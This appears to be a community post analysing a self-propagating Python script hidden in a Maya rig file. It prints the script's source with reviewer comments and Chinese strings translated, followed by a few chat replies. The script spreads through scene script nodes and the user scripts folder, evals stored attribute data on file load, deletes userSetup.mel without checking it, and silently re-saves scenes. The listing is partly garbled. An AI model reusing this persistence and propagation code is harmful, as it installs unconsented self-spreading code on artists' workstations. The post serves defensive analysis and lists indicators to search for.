This is a scene file from CG Monastery Discord chat user @roly, containing an embedded script that auto-installs and calls itself on SceneSave. The script was found in the rig, bat_rig_04.mb, rather than in the animation file, TURN_ani_bat_23.ma. Find the imported scene file below (5340 kb).
What happens?
- Installs itself on scene-open, as a cmds.scriptJob
- Installs itself on Maya open, as ~/maya/scripts/vaccine.py
- Warning on scene save with the following message
Suspicious words
- virus
- antivirus
- vaccine
Suspicious calls
Calls that don't belong in any rig or animation file.
os.makedirs
os.remove
os.path.exists
shutil.copyfile
cmds.internalVar
Full Script Job
Obfuscated and hidden inside of the binary .mb file is this.
# coding=utf-8
# @Time : 2020/07/05 15:46
# @Author : \\xe9\\xa1\\xb6\\xe5\\xa4\\xa9\\xe7\\xab\\x8b\\xe5\\x9c\\xb0\\xe6\\x99\\xba\\xe6\\x85\\xa7\\xe5\\xa4\\xa7\\xe5\\xb0\\x86\\xe5\\x86\\x9b
# @File : vaccine.py
# \\xe4\\xbb\\x85\\xe4\\xbd\\x9c\\xe4\\xb8\\xba\\xe5\\x85\\xac\\xe5\\x8f\\xb8\\xe5\\x86\\x85\\xe9\\x83\\xa8\\xe4\\xbd\\xbf\\xe7\\x94\\xa8\\xe4\\xbf\\x9d\\xe6\\x8a\\xa4 \\xe4\\xb8\\x80\\xe6\\x97\\xa6\\xe6\\xb3\\x84\\xe9\\x9c\\xb2\\xe5\\x87\\xba\\xe5\\x8e\\xbb\\xe9\\x80\\xa0\\xe6\\x88\\x90\\xe7\\x9a\\x84\\xe5\\xbd\\xb1\\xe5\\x93\\x8d \\xe6\\x9c\\xac\\xe4\\xba\\xba\\xe6\\xa6\\x82\\xe4\\xb8\\x8d\\xe8\\xb4\\x9f\\xe8\\xb4\\xa3
import maya.cmds as cmds
import os
import shutil
class phage:
# NOTE(review): reproduced as extracted from the .mb file. Indentation was
# lost in extraction and clone_gene is visibly garbled (missing quotes, an
# undefined `bs`), so statement nesting cannot be fully recovered from this
# listing. The comments below describe only what the visible lines do.
#
# Artefacts named in this listing that a defender can search a scene or
# workstation for: script nodes 'vaccine_gene' and 'breed_gene', the file
# '/scripts/vaccine.py' under Maya's userAppDir, a 'history' folder holding a
# '<scene>_backup.ma ' copy, and a protected "SceneSaved" scriptJob that runs
# "leukocyte.antivirus()".
#
# backup(path): copy the file at `path` into a 'history' folder next to it,
# creating that folder when it does not exist.
@staticmethod
def backup(path):
# Folder and base name are derived by splitting on '/' and '.' only.
folder_path = path.rsplit('/', 1)[0]
file_name = path.rsplit('/', 1)[-1].rsplit('.', 1)[0]
backup_folder = folder_path + '/history'
# The target name literal ends with a trailing space ('_backup.ma ').
new_file = backup_folder + '/' + file_name + '_backup.ma '
if not os.path.exists(backup_folder):
os.makedirs(backup_folder)
shutil.copyfile(path, new_file)
# antivirus(): the routine the SceneSaved scriptJob invokes (see occupation).
# It first re-runs clone_gene() and antivirus_virus_base(), so each call also
# re-creates the script's own nodes and deletes userSetup.mel, then removes
# scriptJobs and script nodes that contain one of three marker strings.
def antivirus(self):
health = True
self.clone_gene()
self.antivirus_virus_base()
# Marker substrings the scan looks for in job descriptions and script nodes.
virus_gene = ['sysytenasdasdfsadfsdaf_dsfsdfaasd', 'PuTianTongQing', 'daxunhuan']
all_script_jobs = cmds.scriptJob(listJobs=True)
for each_job in all_script_jobs:
for each_gene in virus_gene:
if each_gene in each_job:
# As listed, this is the only place `health` is cleared.
health = False
# The job number is the text before the first ':' of the job description.
job_num = int(each_job.split(':', 1)[0])
# force=True is passed so the kill also applies to protected jobs.
cmds.scriptJob(kill=job_num, force=True)
# Second pass: every node of type 'script' has its `.before` attribute checked.
all_script = cmds.ls(type='script')
if all_script:
for each_script in all_script:
commecnt = cmds.getAttr(each_script + '.before')
for each_gene in virus_gene:
if commecnt:
if each_gene in commecnt:
try:
cmds.delete(each_script)
# Bare except: any failure to delete is reported with the node-name prefix
# taken before the last ':'.
except:
name_space = each_script.rsplit(':',1)[0]
# The escaped bytes decode (UTF-8) to Chinese text meaning roughly
# "{} is infected, but I am unable to delete it".
cmds.error(u'{}\\xe8\\xa2\\xab\\xe6\\x84\\x9f\\xe6\\x9f\\x93\\xe4\\xba\\x86\\xef\\xbc\\x8c\\xe4\\xbd\\x86\\xe6\\x98\\xaf\\xe6\\x88\\x91\\xe6\\xb2\\xa1\\xe6\\xb3\\x95\\xe5\\x88\\xa0\\xe9\\x99\\xa4'.format(name_space))
# When a marker was found in a scriptJob: back up the current scene, save it
# in place without asking the user, then raise an error message.
if not health:
file_path = cmds.file(query=True, sceneName=True)
self.backup(file_path)
cmds.file(save=True)
# Decodes (UTF-8) to roughly: "Your file was infected, but I have
# considerately disinfected it and backed it up for you~ no need to thank me~".
cmds.error(u'\\xe4\\xbd\\xa0\\xe7\\x9a\\x84\\xe6\\x96\\x87\\xe4\\xbb\\xb6\\xe8\\xa2\\xab\\xe6\\x84\\x9f\\xe6\\x9f\\x93\\xe4\\xba\\x86\\xef\\xbc\\x8c\\xe4\\xbd\\x86\\xe6\\x98\\xaf\\xe6\\x88\\x91\\xe8\\xb4\\xb4\\xe5\\xbf\\x83\\xe7\\x9a\\x84\\xe4\\xb8\\xba\\xe6\\x82\\xa8\\xe6\\x9d\\x80\\xe6\\xaf\\x92\\xe5\\xb9\\xb6\\xe4\\xb8\\x94\\xe5\\xa4\\x87\\xe4\\xbb\\xbd\\xe4\\xba\\x86~\\xe4\\xb8\\x8d\\xe7\\x94\\xa8\\xe8\\xb0\\xa2~')
else:
# Decodes (UTF-8) to roughly: "Your file is perfectly healthy~ just letting
# you know, nothing else meant". This is the warning shown on scene save.
cmds.warning(u'\\xe4\\xbd\\xa0\\xe7\\x9a\\x84\\xe6\\x96\\x87\\xe4\\xbb\\xb6\\xe8\\xb4\\xbc\\xe5\\x81\\xa5\\xe5\\xba\\xb7~\\xe6\\x88\\x91\\xe5\\xb0\\xb1\\xe8\\xaf\\xb4\\xe4\\xb8\\x80\\xe5\\xa3\\xb0\\xe6\\xb2\\xa1\\xe6\\x9c\\x89\\xe5\\x88\\xab\\xe7\\x9a\\x84\\xe6\\x84\\x8f\\xe6\\x80\\x9d')
# antivirus_virus_base(): delete '/scripts/userSetup.mel' under Maya's
# userAppDir when it exists. No visible line inspects the file's content, so a
# legitimate userSetup.mel is removed as well.
@staticmethod
def antivirus_virus_base():
virus_base = cmds.internalVar(userAppDir=True) + '/scripts/userSetup.mel'
if os.path.exists(virus_base):
try:
os.remove(virus_base)
except:
# Decodes (UTF-8) to roughly: "Disinfection failed".
cmds.error(u'\\xe6\\x9d\\x80\\xe6\\xaf\\x92\\xe5\\xa4\\xb1\\xe8\\xb4\\xa5')
# clone_gene(): the self-persistence step. The visible lines read
# '/scripts/vaccine.py' into a list of lines, create script nodes named
# 'vaccine_gene' and 'breed_gene' with st=1 (Maya's "execute on file load or on
# node deletion" script type), and store the file's lines on
# 'vaccine_gene.notes'.
# NOTE(review): this method is garbled in the listing. The first triple-quoted
# string appears to have absorbed code that was not part of it, `bs` is never
# assigned, and quotes are missing inside both strings, so the exact original
# payload cannot be stated from this page.
def clone_gene(self):
vaccine_path = cmds.internalVar(userAppDir=True) + '/scripts/vaccine.py'
if not cmds.objExists('vaccine_gene'):
if os.path.exists(vaccine_path):
gene = list()
with open(vaccine_path, "r") as f:
for line in f.readlines():
gene.append(line)
# The string below references `import vaccine`, `vaccine.phage()` and a write
# of `petri_dish_gene` to `petri_dish_path`; neither name is defined in the
# visible text.
npetri_dish_gene = """
import sys
import maya.cmds as cmds
maya_path = cmds.internalVar(userAppDir=True) + /scripts
if maya_path not in sys.path:
sys.path.append(maya_path)
import vaccine
cmds.evalDeferred(leukocyte = vaccine.phage())
cmds.evalDeferred(leukocyte.occupation())
with open(petri_dish_path, "w") as f:
f.writelines(petri_dish_gene)
"""
# Creates the 'vaccine_gene' python script node; its body comes from `bs`.
cmds.scriptNode(st=1,
n='vaccine_gene', stp='python',
bs=bs)
# The copy of vaccine.py travels inside the scene as a string attribute.
cmds.addAttr('vaccine_gene', ln="notes", sn="nts", dt="string")
cmds.setAttr('vaccine_gene.notes', gene, type='string')
# The 'breed_gene' node body, as listed, rewrites vaccine.py from
# eval() of the 'vaccine_gene.notes' attribute when the file is missing, i.e.
# attribute data stored in the scene is evaluated as Python on load.
if not cmds.objExists('breed_gene'):
cmds.scriptNode(st=1,
n='breed_gene',
stp='python',
bs="""\
import os
vaccine_path = cmds.internalVar(userAppDir=True) + /scripts/vaccine.py
if not os.path.exists(vaccine_path):
if cmds.objExists(vaccine_gene):
gene = eval(cmds.getAttr(vaccine_gene.notes))
with open(vaccine_path, "w") as f:
f.writelines(gene)
""")
# occupation(): register a scriptJob on the "SceneSaved" event that runs the
# command string "leukocyte.antivirus()". protected=True means the job is not
# removed by an ordinary kill; the force flag is needed.
# NOTE(review): `leukocyte` is not defined in this class; it appears only
# inside the garbled string in clone_gene, presumably as a global created
# there, which cannot be confirmed from this listing.
def occupation(self):
cmds.scriptJob(event=["SceneSaved", "leukocyte.antivirus()"], protected=True)
just came across this randomly, here's a few strings in that file translated into English.
Vaguely looks like self-propagating guerilla antivirus. Designed to remove certain malware from Maya installs, hilarious.
^ Hilarious. There must be a story behind this.